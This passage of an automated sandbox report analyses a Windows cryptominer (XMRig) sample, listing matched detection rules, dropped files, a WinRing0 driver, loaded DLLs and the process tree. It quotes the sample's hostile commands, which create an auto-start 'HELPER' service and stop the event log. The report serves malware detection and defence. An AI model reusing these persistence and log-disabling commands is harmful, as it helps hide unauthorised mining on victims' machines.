                  Source: 10.3.helper.exe.17e8e2f0000.2.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                  Source: 10.3.helper.exe.17e8e2f0000.2.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                  Source: 10.3.helper.exe.17e8e2f0000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                  Source: 0000000C.00000002.2455424304.0000000140360000.00000002.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                  Source: 0000000A.00000003.1213666301.0000017E8E2F0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                  Source: 0000000A.00000003.1213666301.0000017E8E2F0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                  Source: 0000000A.00000003.1213666301.0000017E8E2F0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                  Source: Process Memory Space: helper.exe PID: 8032, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                  Source: Process Memory Space: svchost.exe PID: 8072, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                  Source: classification engineClassification label: mal100.troj.evad.mine.winEXE@27/7@4/4
                  Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2496:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7960:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7968:120:WilError_03
                  Source: C:\Windows\System32\svchost.exeMutant created: \BaseNamedObjects\Global\tjenyubsywjxjnhy
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7904:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7852:120:WilError_03
                  Source: C:\ProgramData\helper\helper.exeFile created: C:\Windows\TEMP\mmxeblqzpfkl.sysJump to behavior
                  Source: nbtypsfikkad.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                  Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\System32\svchost.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\BITSJump to behavior
                  Source: nbtypsfikkad.exeVirustotal: Detection: 70%
                  Source: nbtypsfikkad.exeReversingLabs: Detection: 76%
                  Source: C:\Users\user\Desktop\nbtypsfikkad.exeFile read: C:\Users\user\Desktop\nbtypsfikkad.exeJump to behavior
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                  Source: unknownProcess created: C:\Users\user\Desktop\nbtypsfikkad.exe "C:\Users\user\Desktop\nbtypsfikkad.exe"
                  Source: C:\Users\user\Desktop\nbtypsfikkad.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "HELPER"
                  Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\nbtypsfikkad.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "HELPER" binpath= "C:\ProgramData\helper\helper.exe" start= "auto"
                  Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\nbtypsfikkad.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
                  Source: C:\Users\user\Desktop\nbtypsfikkad.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "HELPER"
                  Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\ProgramData\helper\helper.exe C:\ProgramData\helper\helper.exe
                  Source: C:\ProgramData\helper\helper.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
                  Source: C:\ProgramData\helper\helper.exeProcess created: C:\Windows\System32\svchost.exe svchost.exe
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                  Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\nbtypsfikkad.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "HELPER"Jump to behavior
                  Source: C:\Users\user\Desktop\nbtypsfikkad.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "HELPER" binpath= "C:\ProgramData\helper\helper.exe" start= "auto"Jump to behavior
                  Source: C:\Users\user\Desktop\nbtypsfikkad.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlogJump to behavior
                  Source: C:\Users\user\Desktop\nbtypsfikkad.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "HELPER"Jump to behavior
                  Source: C:\ProgramData\helper\helper.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exeJump to behavior
                  Source: C:\ProgramData\helper\helper.exeProcess created: C:\Windows\System32\svchost.exe svchost.exeJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenableJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\nbtypsfikkad.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\ProgramData\helper\helper.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: napinsp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: pnrpnsp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wshbth.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winrnr.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: moshost.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mapsbtsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mosstorage.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mapconfiguration.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: aphostservice.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: networkhelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: userdataplatformhelperutil.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mccspal.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: vaultcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dmcfgutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dmcmnutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dmxmlhelputils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: inproclogger.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: windows.networking.connectivity.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: synccontroller.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: aphostclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: accountaccessor.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dsclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: systemeventsbrokerclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: userdatalanguageutil.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mccsengineshared.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cemapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: userdatatypehelperutil.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: phoneutil.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: storsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fltlib.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bcd.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: storageusage.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dllJump to behavior
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dllJump to behavior
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wscapi.dllJump to behavior
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sppc.dllJump to behavior
                  Source: nbtypsfikkad.exeStatic PE information: Image base 0x140000000 > 0x60000000
                  Source: nbtypsfikkad.exeStatic file information: File size 7113728 > 1048576
                  Source: nbtypsfikkad.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x6c0000
                  Source: nbtypsfikkad.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: helper.exe, 0000000A.00000003.1212910647.0000017E8E1E0000.00000004.00000001.00020000.00000000.sdmp
                  Source: nbtypsfikkad.exeStatic PE information: section name: .00cfg
                  Source: helper.exe.1.drStatic PE information: section name: .00cfg
                  Source: C:\Windows\System32\conhost.exeCode function: 11_2_0000000140001394 push qword ptr [0000000140008004h]; ret 11_2_0000000140001403

                  Persistence and Installation Behavior

                  barindex
                  Source: C:\ProgramData\helper\helper.exeFile created: C:\Windows\TEMP\mmxeblqzpfkl.sysJump to behavior
                  Source: C:\Users\user\Desktop\nbtypsfikkad.exeFile created: C:\ProgramData\helper\helper.exeJump to dropped file
                  Source: C:\ProgramData\helper\helper.exeFile created: C:\Windows\Temp\mmxeblqzpfkl.sysJump to dropped file
                  Source: C:\Users\user\Desktop\nbtypsfikkad.exeFile created: C:\ProgramData\helper\helper.exeJump to dropped file
                  Source: C:\ProgramData\helper\helper.exeFile created: C:\Windows\Temp\mmxeblqzpfkl.sysJump to dropped file
                  Source: C:\Users\user\Desktop\nbtypsfikkad.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "HELPER"
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
